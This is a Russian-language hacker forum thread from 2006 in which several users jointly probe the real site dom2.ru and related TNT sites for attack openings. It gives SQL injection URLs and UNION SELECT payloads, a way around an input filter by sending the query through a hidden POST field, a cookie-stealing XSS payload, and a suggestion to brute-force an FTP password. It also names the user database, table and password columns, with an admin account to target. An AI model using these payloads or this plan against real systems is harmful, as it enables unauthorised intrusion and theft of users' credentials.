PDA

Просмотр полной версии : SQL-injection dom2.ru


steamer
09.10.2006, 19:34
Не люблю дом 2 и решил полазить по сайту. Полазив увидел, что вроде в ссылка и в формах везде стоит фильтрующий скрипт, т.е. никакой ' и других похожих знаков, а также union и другие слова. Только вот в магазине, при в url (да и не только в магазине) можно написать &id=1+1 или что-то похожее, но есть скрипт, который не фильтрует union запросы. Единственная проблема, вкл мэджик квоутс. Полазил сам, но нет времени и желания дальше разрабатывать. Кто хочет, смотрите:

http://shop.dom2.ru/shop/index.phtml?prod=62%200 - Вызывает ошибку.

Там есть скрытое поле prod, в которое можно вводить текст типа 0 union select * from ...

Дерзайте. Только обязательно расскажите, что еще там можно. :cool:

Utochka
09.10.2006, 19:52
думаю что бы проще было подобрать поля, нужно взять журнал хакер в котором было видео про взлом дом2 и глянуть там названия полей и собственно структуру базы

Digimortal
09.10.2006, 23:24
хе, я недавно эту скуль в магазине тоже обнаруживал..
щас посмотрю что там на видео было...

steamer
10.10.2006, 12:44
Так что, это уже было, а в каком номере? Я че-то летом на журнал забил.

guest3297
10.10.2006, 16:26
Иньекция на лицо....
http://shop.dom2.ru/shop/index.phtml?prod=62+or+1=1
Кто выложите видео или структуру...

Ch3ck
10.10.2006, 17:08
_http://shop.dom2.ru/shop/index.phtml?prod=.

Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

_http://shop.dom2.ru/shop/index.phtml?prod=...

Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1

Хм, вещь какая-то:
_http://img145.imageshack.us/my.php?image=dombh0.jpg

blackybr
10.10.2006, 17:38
баян.. после 1го взлома там все фильтруется, юнион селект не проведешь - фильтр на некотрые нужные символы, а во вторых там ограничение на длину пеерменной .. символов 10 не больше (не помню точно).

Digimortal
10.10.2006, 17:48
баян.. после 1го взлома там все фильтруется, юнион селект не проведешь - фильтр на некотрые нужные символы, а во вторых там ограничение на длину пеерменной .. символов 10 не больше (не помню точно).
так это фильтруется если через ГЕТ (фильтруются не только некоторые символы, но и "union" и "select" и еще кой че), а если вставлять запрос через hidden-поле в сурсе, то запросы ПОСТОМ проходят...

Digimortal
10.10.2006, 17:54
Так что, это уже было, а в каком номере? Я че-то летом на журнал забил.
это было в 76 номере, кстати, эти ошибки там уже и описывались...
а видео я к сожалению так и не нашел..

steamer
10.10.2006, 17:57
Да, фильтр только на гет стоит. Вообще из личных наблюдений, то там параметр prod исользуется 2 запросами, в одном из них выводится 5 значений (полей), в другом 8. Если в хиден поле такое

0 UNION SELECT null
то ошибки две
Query Error!

The used SELECT statements have a different number of columnsQuery Error!

The used SELECT statements have a different number of columns

Если

0 union select null,null,null,null,null

или

0 union select null,null,null,null,null,null,null,null

то одна
Query Error!

The used SELECT statements have a different number of columns

Сложность в том, что в любом случае я не смог работать, потому что не видел результата из-за одной из ошибок. Использование char() вроде запрещено. Хотя я не уверен, до этого редко с ним работал, но вроде получалось.

steamer
10.10.2006, 18:03
Хм, вещь какая-то:
_http://img145.imageshack.us/my.php?image=dombh0.jpg

Это вроде счетчик рамблера. Точка от него.

Digimortal
10.10.2006, 18:12
Сложность в том, что в любом случае я не смог работать, потому что не видел результата из-за одной из ошибок. Использование char() вроде запрещено. Хотя я не уверен, до этого редко с ним работал, но вроде получалось.

ну да, ту же ботву вчера обнаружил...

http://shop.dom2.ru/shop/index.phtml?prod=<BODY%20ONLOAD=alert(document.cookie)> <==xss получаица:)

а может эту тему в "XSS, SQL, Инъекции. Уязвимости, найденные вами" перенести?

blackybr
10.10.2006, 19:01
Статья в ксакепе называлалсь что-то вроде Тотальный дестрой дома два...
там на скриншотах бд в подробностях показывалась =)

в тему о том что написал чувак снизу - там название полей были видны. и названия бд.. врядли изменили..

guest3297
10.10.2006, 19:02
ДА токо поля осталось подобрать...

Digimortal
10.10.2006, 22:15
Статья в ксакепе называлалсь что-то вроде Тотальный дестрой дома два...
там на скриншотах бд в подробностях показывалась =)

в тему о том что написал чувак снизу - там название полей были видны. и названия бд.. врядли изменили..
так мож выложишь тут? названия полей.. а то у меня журнал то есть, но живу я щас не дома..

Ch3ck
10.10.2006, 22:21
Вот залил к себе... а то там много.
_http://killsite.narod.ru/068/1.htm (только тут без скринов.)

И кстати, насколько я помню он там вообще через другой, проэкт ломанул, который просто на одном сервере с Домом 2 лежит.
Там phpBB 2.0.6 стоял. Не удивительно.
P.S - завтра пойдём гулять, забегу к знакомому, у него походу это видео есть. Потом залью куда-нить.

Sn@k3
10.10.2006, 22:25
гы Его уже имели =) вроде как видео даже на видеоачате есть, если не ошибаюсь, если есть, то вперед! =)

+toxa+
10.10.2006, 22:45
https://forum.antichat.ru/thread18640.html

Хы, мы тогда больше нашли)

Digimortal
10.10.2006, 23:22
упомянутая в статье Гринвуда полезная ссылочка _http://www.tnt-tv.ru/info.php и сейчас вполне рабочая..
кроме того там упоминается логин к фтп, мож стоить побрутить? полтора года назад там стоял "сложный" трехбуквенный пасс :)

Digimortal
10.10.2006, 23:32
мля, а че это _www.dom.2 перестала работать? shop работает, а сам сайт - нет...
признавайтесь, кто испортил сайт?? =)))

limpompo
11.10.2006, 00:27
Warning: chmod(): Operation not permitted in /var/www/html/tntbrat.ru/_protected_/inc/site_common.inc on line 455

Ch3ck
11.10.2006, 00:42
А всё...вижу...где

guest3297
11.10.2006, 00:46
Давайте кто первый сломает :p

Digimortal
11.10.2006, 00:53
https://forum.antichat.ru/thread18640.html

Хы, мы тогда больше нашли)
Тут ведь важно не количество, а качество =)

guest3297
11.10.2006, 01:00
tntbrat.ru
dom2.ru на разных ip...

Ch3ck
11.10.2006, 01:02
Двиг, один и тот же.(Диз. разный)

guest3297
11.10.2006, 01:02
http://tntbrat.ru/bulletin/news/?id=1908
Warning: chmod(): Operation not permitted in /var/www/html/tntbrat.ru/_protected_/inc/site_common.inc on line 455

И ВСЕ ОСТАЛЬНЫЕ НЬЮСЫ... JB<RF ВЫВОДИТЬСЯ 1 РАЗ.

Digimortal
11.10.2006, 01:37
']tntbrat.ru
dom2.ru на разных ip...
и что с того? поддомены дома2 тож на разных ip..

VampiRUS
11.10.2006, 04:52
то ли пропитчили то ли что, теперь перекидывает на index.phtml?cat=, и саму кнопку убрали.

steamer
17.10.2006, 00:17
Нашел XSS на форуме. После регистрации, раздел Изменение анкеты при добавлении фотографии в подписи можно вставить хсс.

Кто хочет попробовать что-нить:

http://connect.dom2.ru

user:tester123
pass:123456

Ch3ck
17.10.2006, 00:34
Там, если нажать "Удалить фото", то всякая беда вываливается...
_http://connect.dom2.ru/searchUserByLogin.do тут вот алерт вылетает.

steamer
17.10.2006, 20:12
Не, при удалении понятно. Это походу Java. Во всяком случае похоже. А вот алерт это мой вылетает. Просто залил фото, вставил в подпись <script> alert('XSS')<script>, а удалить не смог, ошибка.

Ch3ck
17.10.2006, 20:14
После твоего алерта мой с куками вылетает.

blackybr
17.10.2006, 20:24
бд - dom2
таблица с юзерами - site_users
поля - users_Login, users_Password

нужный вам чел с ником root

steamer
18.10.2006, 18:54
бд - dom2
таблица с юзерами - site_users
поля - users_Login, users_Password
Спасибо. Я как раз хотел искать в журналы лезть.